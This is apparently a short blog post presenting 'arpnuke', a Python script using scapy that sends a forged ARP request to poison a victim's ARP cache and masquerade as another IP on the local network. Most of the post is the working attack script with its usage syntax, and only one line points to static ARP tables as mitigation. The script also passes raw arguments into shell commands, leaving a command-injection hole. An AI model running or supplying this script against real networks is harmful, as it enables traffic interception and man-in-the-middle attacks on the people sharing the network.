Here is a simple script I wrote in python. It performs an ARP poisoning attack by sending a forged ARP request packet.
The syntax is "arpnuke [interface] [victim IP] [IP to masquerade as]"
For it to work it must be run as root and scapy must be installed.
The best way to mitigate this attack is with static ARP tables. See the man page for arp and the ifconfig -arp option for more info.
#!/usr/bin/python
import sys
from scapy.all import Ether,ARP,conf,sendp
import os
interface = sys.argv[1]
victim = sys.argv[2]
identity = sys.argv[3]
conf.iface = interface
print conf.iface
if (os.system('cat /proc/net/arp | grep ' + victim)):
os.system('arping -f -I ' + interface + ' ' + victim)
def local_mac(iface):
os.system('touch /tmp/.arpnuketmp')
os.system('ifconfig ' + iface + ' | grep HWaddr | cut -d" " -f11 > /tmp/.arpnuketmp')
f = open('/tmp/.arpnuketmp', 'r')
return f.readline()[:-1]
f.close()
def neigh_mac(ip):
os.system('touch /tmp/.arpnuketmp')
os.system('arp -na | grep ' + ip + ' | cut -d" " -f4 > /tmp/.arpnuketmp')
f = open('/tmp/.arpnuketmp', 'r')
return f.readline()[:-1]
f.close()
destmac = neigh_mac(victim)
srcmac = local_mac(interface)
ether = Ether(dst=destmac, src=srcmac, type=0x806)
arp = ARP(hwsrc=srcmac, psrc=identity, hwdst=destmac, pdst=victim, op=1)
sendp(ether/arp)
No comments:
Post a Comment